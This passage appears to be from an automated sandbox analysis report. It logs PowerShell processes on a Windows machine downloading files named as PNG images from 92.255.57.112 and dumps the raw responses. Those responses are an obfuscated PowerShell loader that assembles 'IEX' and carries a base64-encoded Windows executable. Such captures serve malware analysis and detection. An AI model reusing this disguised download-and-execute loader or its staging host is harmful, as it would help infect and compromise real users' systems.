                                                                                                                                                        Jan 15, 2025 10:18:38.761105061 CET1289INData Raw: 59 67 64 71 6d 4b 4f 69 55 6d 4f 50 50 39 2f 2f 38 52 42 78 45 4b 6c 52 4d 4c 49 45 31 75 6e 32 49 34 34 76 33 2f 2f 78 45 49 45 51 59 6c 46 31 67 54 42 68 45 4c 30 70 77 52 43 42 45 47 4a 52 64 59 45 77 59 52 43 78 35 6b 30 70 77 52 43 42 45 47
                                                                                                                                                        Data Ascii: YgdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJRdYEwYRCx8QZNKcEQwg+KaJqVognZdaHWE4o/3//xYTBRYTBhEMIIcsqeRaIEkJMElhOIr9//8RBxoRBxqVCBqVYZ4RBxsRBxuVCBuVYZ4RBxwRBxyVCByVYZ4RBx0RBx2VCB2VYZ4RBx4RBx6VCB6VYZ4RBx8JE
                                                                                                                                                        Jan 15, 2025 10:18:38.761184931 CET1289INData Raw: 67 72 4d 46 5a 68 47 45 34 36 2f 37 2f 2f 78 45 47 70 51 45 41 41 42 73 4c 45 51 63 67 61 6a 2b 65 72 31 6f 67 4f 59 52 52 6a 47 45 34 30 50 37 2f 2f 79 68 49 41 67 41 47 66 67 45 41 41 41 51 43 43 43 67 62 41 67 41 47 4b 46 51 42 41 41 61 6c 41
                                                                                                                                                        Data Ascii: grMFZhGE46/7//xEGpQEAABsLEQcgaj+er1ogOYRRjGE40P7//yhIAgAGfgEAAAQCCCgbAgAGKFQBAAalAQAAGwsRByBb4PcIWiBHvqiEYTih/v//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwXQAQAAGyh6AQAGKHACAAYRBSiZAgAGEwYRByAGB1ewWi
                                                                                                                                                        Jan 15, 2025 10:18:38.761372089 CET1289INData Raw: 46 76 34 63 41 51 41 41 47 79 68 2b 41 51 41 47 45 51 63 67 77 4b 51 78 39 6c 6f 67 51 73 37 43 49 57 45 34 4c 66 37 2f 2f 33 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67
                                                                                                                                                        Data Ascii: Fv4cAQAAGyh+AQAGEQcgwKQx9logQs7CIWE4Lf7//34BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMF0AEAABsoegEABihwAgAGEQUomQIABhMGfgEAAAQCEQYWEQQaWSh+AQAGEQalAQAAGwsRByC6SCe+WiCnDg/PYTin/f//Bm4Xai4IIG4xC0clKwYg17l
                                                                                                                                                        Jan 15, 2025 10:18:38.761393070 CET1289INData Raw: 41 43 4a 41 41 41 41 54 51 49 41 41 4a 77 41 41 41 43 43 41 67 41 41 75 41 41 41 41 41 55 41 41 41 43 64 41 67 41 41 51 41 41 41 41 42 6f 41 41 41 41 6d 41 51 41 41 7a 51 45 41 41 48 6b 42 41 41 41 4d 41 51 41 41 4a 51 49 41 41 47 63 43 41 41 41
                                                                                                                                                        Data Ascii: ACJAAAATQIAAJwAAACCAgAAuAAAAAUAAACdAgAAQAAAABoAAAAmAQAAzQEAAHkBAAAMAQAAJQIAAGcCAAA4mAIAAAIfHmQKEQcgVxnlPlog6ErzJWErjX4BAAAEAgkW/hwBAAAbKH4BAAYRByAXY2dZWiBuyGoSYThn////KEgCAAZ+AQAABAIIKBsCAAYoVAEABqUBAAAbCxEHILR9cCJaIEI1r+5hODj///8GbhdqLggg0bDf
                                                                                                                                                        Jan 15, 2025 10:18:38.761523008 CET1289INData Raw: 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69
                                                                                                                                                        Data Ascii: 4BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYAwRByB0jl0OWiCgpCRYYTjj/v//fgEAAAQCCRb+HAEAABsofgEABhEHIK0RFAxaILc72TNhOL3+//8oSAIABn4BAAAEAggoGwIABihUAQAGpQEAABsLEQcg0swPhlogHwvpSmE4jv7//xEGpQEAABsLEQcgLHwLR
                                                                                                                                                        Jan 15, 2025 10:18:38.761600018 CET1289INData Raw: 47 45 51 77 67 42 79 37 44 54 31 6f 67 61 71 49 41 56 32 45 34 56 76 37 2f 2f 78 45 49 4b 43 45 42 41 41 59 6f 76 67 41 41 42 6f 41 44 41 41 41 45 45 51 77 67 68 5a 79 54 32 46 6f 67 32 2b 72 76 67 57 45 34 4d 76 37 2f 2f 77 6b 4a 48 77 31 6b 59
                                                                                                                                                        Data Ascii: GEQwgBy7DT1ogaqIAV2E4Vv7//xEIKCEBAAYovgAABoADAAAEEQwghZyT2Fog2+rvgWE4Mv7//wkJHw1kYQ0JCR8ZYmENIA7JG8I4Gv7//xYTChEMILl3cUBaINb3SAthOAT+//8RBx8JEQcfCZUIHwmVYZ4RBx8KEQcfCpUIHwqVYZ4RBx8LEQcfC5UIHwuVYZ4RBx8MEQcfDJUIHwyVYZ4RBx8NEQcfDZUIHw2VYZ4RBx8OEQ
                                                                                                                                                        Jan 15, 2025 10:18:38.761713028 CET1289INData Raw: 41 41 41 45 4b 68 4d 77 42 77 44 58 41 51 41 41 42 77 41 41 45 51 4e 37 43 51 41 41 42 42 38 4c 5a 41 4a 37 42 51 41 41 42 46 6f 4b 41 33 73 49 41 41 41 45 42 6b 46 33 41 51 41 41 48 45 55 42 41 41 41 41 39 76 2f 2f 2f 78 63 74 42 74 41 6a 41 41
                                                                                                                                                        Data Ascii: AAAEKhMwBwDXAQAABwAAEQN7CQAABB8LZAJ7BQAABFoKA3sIAAAEBkF3AQAAHEUBAAAA9v///xctBtAjAAAGJiBsqaeFIPxTwoFhJQsfCl5FCgAAAD8BAABoAQAAw////2YAAAAFAAAABwEAAMoAAABaAAAAmwAAACcBAAA4YwEAAAMGfQkAAAQCJXsFAAAEIAAIAAACewUAAARZG2RYfQUAAAQDewkAAAQgAAAAATcSGkUBAAA
                                                                                                                                                        Jan 15, 2025 10:18:38.986166000 CET1289INData Raw: 35 31 61 49 43 45 6f 4d 59 78 68 4b 35 6f 57 43 78 59 4d 45 51 51 67 74 50 74 53 68 56 6f 67 39 68 6e 41 46 57 45 72 68 67 4a 37 42 67 41 41 42 41 62 67 6a 77 49 41 41 41 49 44 4b 43 4d 41 41 41 59 6c 4a 67 30 67 64 49 42 37 4f 6a 68 6d 2f 2f 2f
                                                                                                                                                        Data Ascii: 51aICEoMYxhK5oWCxYMEQQgtPtShVog9hnAFWErhgJ7BgAABAbgjwIAAAIDKCMAAAYlJg0gdIB7Ojhm////CBdYDBEEINoskJpaIKigttJhOE////8IAnsHAAAELwggNbXAeCUrBiAu4cABJSY4Mv///wcqABMwBwDQAAAACQAAERcKFgsWDDiYAAAAIF92nCIgxxIvUGElEwQdXkUHAAAAz////yIAAABKAAAABQAAAJIAAAA2


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.11.204977192.255.57.112808400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 15, 2025 10:18:38.614690065 CET70OUTGET /1/2.png HTTP/1.1
                                                                                                                                                        Host: 92.255.57.112
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 15, 2025 10:18:38.832935095 CET1289INHTTP/1.1 200 OK
                                                                                                                                                        Content-Type: image/png
                                                                                                                                                        Last-Modified: Tue, 14 Jan 2025 22:09:21 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        ETag: "a36a62f6d066db1:0"
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        Date: Wed, 15 Jan 2025 09:18:38 GMT
                                                                                                                                                        Content-Length: 526214
                                                                                                                                                        Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACsKKGw [TRUNCATED]
                                                                                                                                                        Jan 15, 2025 10:18:38.833007097 CET1289INData Raw: 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 42 33 63 6b 65 42 68 4a 52 4d 47 47 31 35 46 42 51 41 41 41 4e 66 2f 2f 2f 38 46 41 41 41 41 6f 41 41 41 41 46 55 41 41 41 43 44 41 41 41 41 4f 4a 73 41 41 41
                                                                                                                                                        Data Ascii: 2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhxT+BgMAAAZzdgAACij+AAAGDQkXKM0CAAYJfgwBAAQocgEABiAJzKC
                                                                                                                                                        Jan 15, 2025 10:18:38.833159924 CET1289INData Raw: 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 67 36 41 67 41 47 4b 67 41 54 4d 41 67 41 64 67 45 41 41 41 51 41 41 42 45 43 4b 4d 67 42 41 41 59 4b 63 79 38 41 41 41 59 4c 49 47 39 76 53 34 6f 67 4a 45 79 73 67 57 45 6c 45 77 6b 66 44 46 35
                                                                                                                                                        Data Ascii: zAEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAAUAAABIAAAAqQAAADgPAQAAEQQeMggg630YwiUrBiDox/uxJSYrpBYTBBEJINd7ZdFaIHIBx1phK5EbKLwBAAYMEQkgdwR4Dlog9klhNmE4
                                                                                                                                                        Jan 15, 2025 10:18:38.833287001 CET1289INData Raw: 59 67 64 71 6d 4b 4f 69 55 6d 4f 50 50 39 2f 2f 38 52 42 78 45 4b 6c 52 4d 4c 49 45 31 75 6e 32 49 34 34 76 33 2f 2f 78 45 49 45 51 59 6c 46 31 67 54 42 68 45 4c 30 70 77 52 43 42 45 47 4a 52 64 59 45 77 59 52 43 78 35 6b 30 70 77 52 43 42 45 47
                                                                                                                                                        Data Ascii: YgdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJRdYEwYRCx8QZNKcEQwg+KaJqVognZdaHWE4o/3//xYTBRYTBhEMIIcsqeRaIEkJMElhOIr9//8RBxoRBxqVCBqVYZ4RBxsRBxuVCBuVYZ4RBxwRBxyVCByVYZ4RBx0RBx2VCB2VYZ4RBx4RBx6VCB6VYZ4RBx8JE
                                                                                                                                                        Jan 15, 2025 10:18:38.833339930 CET1289INData Raw: 67 72 4d 46 5a 68 47 45 34 36 2f 37 2f 2f 78 45 47 70 51 45 41 41 42 73 4c 45 51 63 67 61 6a 2b 65 72 31 6f 67 4f 59 52 52 6a 47 45 34 30 50 37 2f 2f 79 68 49 41 67 41 47 66 67 45 41 41 41 51 43 43 43 67 62 41 67 41 47 4b 46 51 42 41 41 61 6c 41
                                                                                                                                                        Data Ascii: grMFZhGE46/7//xEGpQEAABsLEQcgaj+er1ogOYRRjGE40P7//yhIAgAGfgEAAAQCCCgbAgAGKFQBAAalAQAAGwsRByBb4PcIWiBHvqiEYTih/v//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwXQAQAAGyh6AQAGKHACAAYRBSiZAgAGEwYRByAGB1ewWi
                                                                                                                                                        Jan 15, 2025 10:18:38.833508015 CET1289INData Raw: 46 76 34 63 41 51 41 41 47 79 68 2b 41 51 41 47 45 51 63 67 77 4b 51 78 39 6c 6f 67 51 73 37 43 49 57 45 34 4c 66 37 2f 2f 33 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67
                                                                                                                                                        Data Ascii: Fv4cAQAAGyh+AQAGEQcgwKQx9logQs7CIWE4Lf7//34BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMF0AEAABsoegEABihwAgAGEQUomQIABhMGfgEAAAQCEQYWEQQaWSh+AQAGEQalAQAAGwsRByC6SCe+WiCnDg/PYTin/f//Bm4Xai4IIG4xC0clKwYg17l
                                                                                                                                                        Jan 15, 2025 10:18:38.833599091 CET1289INData Raw: 41 43 4a 41 41 41 41 54 51 49 41 41 4a 77 41 41 41 43 43 41 67 41 41 75 41 41 41 41 41 55 41 41 41 43 64 41 67 41 41 51 41 41 41 41 42 6f 41 41 41 41 6d 41 51 41 41 7a 51 45 41 41 48 6b 42 41 41 41 4d 41 51 41 41 4a 51 49 41 41 47 63 43 41 41 41
                                                                                                                                                        Data Ascii: ACJAAAATQIAAJwAAACCAgAAuAAAAAUAAACdAgAAQAAAABoAAAAmAQAAzQEAAHkBAAAMAQAAJQIAAGcCAAA4mAIAAAIfHmQKEQcgVxnlPlog6ErzJWErjX4BAAAEAgkW/hwBAAAbKH4BAAYRByAXY2dZWiBuyGoSYThn////KEgCAAZ+AQAABAIIKBsCAAYoVAEABqUBAAAbCxEHILR9cCJaIEI1r+5hODj///8GbhdqLggg0bDf
                                                                                                                                                        Jan 15, 2025 10:18:38.833684921 CET1289INData Raw: 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69
                                                                                                                                                        Data Ascii: 4BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYAwRByB0jl0OWiCgpCRYYTjj/v//fgEAAAQCCRb+HAEAABsofgEABhEHIK0RFAxaILc72TNhOL3+//8oSAIABn4BAAAEAggoGwIABihUAQAGpQEAABsLEQcg0swPhlogHwvpSmE4jv7//xEGpQEAABsLEQcgLHwLR
                                                                                                                                                        Jan 15, 2025 10:18:38.833821058 CET1289INData Raw: 47 45 51 77 67 42 79 37 44 54 31 6f 67 61 71 49 41 56 32 45 34 56 76 37 2f 2f 78 45 49 4b 43 45 42 41 41 59 6f 76 67 41 41 42 6f 41 44 41 41 41 45 45 51 77 67 68 5a 79 54 32 46 6f 67 32 2b 72 76 67 57 45 34 4d 76 37 2f 2f 77 6b 4a 48 77 31 6b 59
                                                                                                                                                        Data Ascii: GEQwgBy7DT1ogaqIAV2E4Vv7//xEIKCEBAAYovgAABoADAAAEEQwghZyT2Fog2+rvgWE4Mv7//wkJHw1kYQ0JCR8ZYmENIA7JG8I4Gv7//xYTChEMILl3cUBaINb3SAthOAT+//8RBx8JEQcfCZUIHwmVYZ4RBx8KEQcfCpUIHwqVYZ4RBx8LEQcfC5UIHwuVYZ4RBx8MEQcfDJUIHwyVYZ4RBx8NEQcfDZUIHw2VYZ4RBx8OEQ
                                                                                                                                                        Jan 15, 2025 10:18:38.833921909 CET1289INData Raw: 41 41 41 45 4b 68 4d 77 42 77 44 58 41 51 41 41 42 77 41 41 45 51 4e 37 43 51 41 41 42 42 38 4c 5a 41 4a 37 42 51 41 41 42 46 6f 4b 41 33 73 49 41 41 41 45 42 6b 46 33 41 51 41 41 48 45 55 42 41 41 41 41 39 76 2f 2f 2f 78 63 74 42 74 41 6a 41 41
                                                                                                                                                        Data Ascii: AAAEKhMwBwDXAQAABwAAEQN7CQAABB8LZAJ7BQAABFoKA3sIAAAEBkF3AQAAHEUBAAAA9v///xctBtAjAAAGJiBsqaeFIPxTwoFhJQsfCl5FCgAAAD8BAABoAQAAw////2YAAAAFAAAABwEAAMoAAABaAAAAmwAAACcBAAA4YwEAAAMGfQkAAAQCJXsFAAAEIAAIAAACewUAAARZG2RYfQUAAAQDewkAAAQgAAAAATcSGkUBAAA
                                                                                                                                                        Jan 15, 2025 10:18:39.049678087 CET1289INData Raw: 35 31 61 49 43 45 6f 4d 59 78 68 4b 35 6f 57 43 78 59 4d 45 51 51 67 74 50 74 53 68 56 6f 67 39 68 6e 41 46 57 45 72 68 67 4a 37 42 67 41 41 42 41 62 67 6a 77 49 41 41 41 49 44 4b 43 4d 41 41 41 59 6c 4a 67 30 67 64 49 42 37 4f 6a 68 6d 2f 2f 2f
                                                                                                                                                        Data Ascii: 51aICEoMYxhK5oWCxYMEQQgtPtShVog9hnAFWErhgJ7BgAABAbgjwIAAAIDKCMAAAYlJg0gdIB7Ojhm////CBdYDBEEINoskJpaIKigttJhOE////8IAnsHAAAELwggNbXAeCUrBiAu4cABJSY4Mv///wcqABMwBwDQAAAACQAAERcKFgsWDDiYAAAAIF92nCIgxxIvUGElEwQdXkUHAAAAz////yIAAABKAAAABQAAAJIAAAA2


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.11.204977292.255.57.112808460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 15, 2025 10:18:38.648339033 CET70OUTGET /1/3.png HTTP/1.1
                                                                                                                                                        Host: 92.255.57.112
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 15, 2025 10:18:38.883505106 CET1289INHTTP/1.1 200 OK
                                                                                                                                                        Content-Type: image/png
                                                                                                                                                        Last-Modified: Tue, 14 Jan 2025 22:31:44 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        ETag: "162f316d466db1:0"
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        Date: Wed, 15 Jan 2025 09:18:38 GMT
                                                                                                                                                        Content-Length: 538502
                                                                                                                                                        Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACsKKGw [TRUNCATED]
                                                                                                                                                        Jan 15, 2025 10:18:38.883801937 CET1289INData Raw: 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 42 33 63 6b 65 42 68 4a 52 4d 47 47 31 35 46 42 51 41 41 41 4e 66 2f 2f 2f 38 46 41 41 41 41 6f 41 41 41 41 46 55 41 41 41 43 44 41 41 41 41 4f 4a 73 41 41 41 41
                                                                                                                                                        Data Ascii: AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhxT+BgMAAAZzdgAACij+AAAGDQkXKM0CAAYJfgwBAAQocgEABiAJzKCB
                                                                                                                                                        Jan 15, 2025 10:18:38.883821964 CET1289INData Raw: 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 67 36 41 67 41 47 4b 67 41 54 4d 41 67 41 64 67 45 41 41 41 51 41 41 42 45 43 4b 4d 67 42 41 41 59 4b 63 79 38 41 41 41 59 4c 49 47 39 76 53 34 6f 67 4a 45 79 73 67 57 45 6c 45 77 6b 66 44 46 35 46
                                                                                                                                                        Data Ascii: AEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAAUAAABIAAAAqQAAADgPAQAAEQQeMggg630YwiUrBiDox/uxJSYrpBYTBBEJINd7ZdFaIHIBx1phK5EbKLwBAAYMEQkgdwR4Dlog9klhNmE4d
                                                                                                                                                        Jan 15, 2025 10:18:38.883970976 CET1289INData Raw: 67 64 71 6d 4b 4f 69 55 6d 4f 50 50 39 2f 2f 38 52 42 78 45 4b 6c 52 4d 4c 49 45 31 75 6e 32 49 34 34 76 33 2f 2f 78 45 49 45 51 59 6c 46 31 67 54 42 68 45 4c 30 70 77 52 43 42 45 47 4a 52 64 59 45 77 59 52 43 78 35 6b 30 70 77 52 43 42 45 47 4a
                                                                                                                                                        Data Ascii: gdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJRdYEwYRCx8QZNKcEQwg+KaJqVognZdaHWE4o/3//xYTBRYTBhEMIIcsqeRaIEkJMElhOIr9//8RBxoRBxqVCBqVYZ4RBxsRBxuVCBuVYZ4RBxwRBxyVCByVYZ4RBx0RBx2VCB2VYZ4RBx4RBx6VCB6VYZ4RBx8JEQ
                                                                                                                                                        Jan 15, 2025 10:18:38.884105921 CET1289INData Raw: 72 4d 46 5a 68 47 45 34 36 2f 37 2f 2f 78 45 47 70 51 45 41 41 42 73 4c 45 51 63 67 61 6a 2b 65 72 31 6f 67 4f 59 52 52 6a 47 45 34 30 50 37 2f 2f 79 68 49 41 67 41 47 66 67 45 41 41 41 51 43 43 43 67 62 41 67 41 47 4b 46 51 42 41 41 61 6c 41 51
                                                                                                                                                        Data Ascii: rMFZhGE46/7//xEGpQEAABsLEQcgaj+er1ogOYRRjGE40P7//yhIAgAGfgEAAAQCCCgbAgAGKFQBAAalAQAAGwsRByBb4PcIWiBHvqiEYTih/v//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwXQAQAAGyh6AQAGKHACAAYRBSiZAgAGEwYRByAGB1ewWiC
                                                                                                                                                        Jan 15, 2025 10:18:38.884160042 CET1289INData Raw: 76 34 63 41 51 41 41 47 79 68 2b 41 51 41 47 45 51 63 67 77 4b 51 78 39 6c 6f 67 51 73 37 43 49 57 45 34 4c 66 37 2f 2f 33 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67 45
